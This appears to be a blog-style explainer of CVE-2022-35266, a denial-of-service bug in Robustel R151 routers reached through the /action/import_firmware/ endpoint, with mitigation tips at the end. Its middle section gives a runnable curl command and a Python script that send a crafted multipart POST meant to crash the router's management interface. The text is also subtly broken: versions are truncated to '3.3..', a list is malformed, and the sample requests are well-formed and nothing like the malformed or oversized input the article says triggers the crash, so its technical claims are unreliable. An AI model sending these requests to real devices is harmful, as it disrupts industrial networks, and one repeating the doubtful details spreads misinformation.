CVE-2022-35266 - Denial-of-Service in Robustel R151 Routers via `/action/import_firmware/` API Explained

In late 2022, a denial-of-service (DoS) vulnerability was uncovered in the Robustel R151 industrial routers, models running firmware versions 3.1.16 and 3.3.. This vulnerability, formally identified as CVE-2022-35266, can be triggered remotely and causes the device’s web server to crash, disrupting network connectivity for industrial systems that depend on these routers.

If you manage or deploy Robustel R151 routers, this deep-dive will help you understand the root of the problem, how it can be triggered, and what you can do about it.

What Is CVE-2022-35266?

Robustel R151 employs an embedded web server for configuration and management. Within this web server, there exists a function involved in processing file uploads at the endpoint /action/import_firmware/. Due to improper handling of specially crafted requests in the hashFirst functionality, an attacker can crash the web server, causing denial of further device management via the web interface.

> TL;DR?  
> A remote attacker can crash your router’s web interface (possibly impacting further networking functionality) just by sending crafted network requests—no login required in some cases.

Vulnerable Endpoint

- /action/import_firmware/

How Does The Exploit Work?

The /action/import_firmware/ endpoint is designed to allow administrators to upload firmware images for updates. The web server code processes the uploaded files using a C function that involves a hash calculation, before verifying or storing the firmware.

If this processing (specifically, the hashFirst functionality) receives malformed multipart data or excessively large boundary values, it can cause the function to either:
- Run out of buffer (triggering a crash due to memory corruption or uncontrolled resource consumption)

Segfault (terminate unexpectedly due to invalid memory handling)

By sending a specially-crafted POST request to the /action/import_firmware/ endpoint, attackers remotely trigger the crash, causing the web server to stop responding.

Exploit Details and Example

You can test or demonstrate this crash using simple tools like curl or Python with the requests library.  
*WARNING:* *Do this only in a controlled environment! This will crash the management interface of the router.*

Example Exploit Using cURL

curl -X POST http://ROUTER-IP/action/import_firmware/ \
  -H "Content-Type: multipart/form-data; boundary=--------------------51234567890123456789" \
  --data-binary $'----------------------51234567890123456789\r\nContent-Disposition: form-data; name="file"; filename="exploit"\r\nContent-Type: application/octet-stream\r\n\r\nCRASHME\r\n----------------------51234567890123456789--'

The key here is the boundary string and the unexpected file content. This triggers the vulnerable code path in the router.

Simple Python Example

import requests

url = "http://ROUTER-IP/action/import_firmware/"
boundary = "--------------------51234567890123456789"
headers = {
    "Content-Type": f"multipart/form-data; boundary={boundary}"
}
data = (
    f"--{boundary}\r\n"
    f'Content-Disposition: form-data; name="file"; filename="crash"\r\n'
    f"Content-Type: application/octet-stream\r\n\r\n"
    f"THIS WILL CRASH\r\n"
    f"--{boundary}--"
)
requests.post(url, headers=headers, data=data)

Change ROUTER-IP to your router’s actual address.

Mitigation & Fix

There is no official patch at time of writing for 3.1.16 or 3.3..

Actions you can take

- Avoid exposing management interfaces (web, SSH, Telnet) to untrusted networks or the public internet.
- Use firewall rules to block suspicious traffic to /action/import_firmware/.

Contact Robustel support for updates or mitigations.

Robustel Security Advisories

References

- Original CVE Record: CVE-2022-35266
- Packet Storm Security Advisory
- Robustel R151 Product Page
- Full Disclosure Mailing List: Robustel DoS

Conclusion

CVE-2022-35266 can bring down management for critical industrial routers with a single POST request—even from the LAN. Security best practice is *never* to expose device management to public networks, but even internally, a compromised device or careless behavior could allow this attack.

Mitigate by restricting access, monitoring logs, and seeking firmware updates.  
Stay safe and keep your infrastructure resilient!


*If you have questions or need more defensive strategies, drop a comment below.*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 05/16/2023 22:36:00 UTC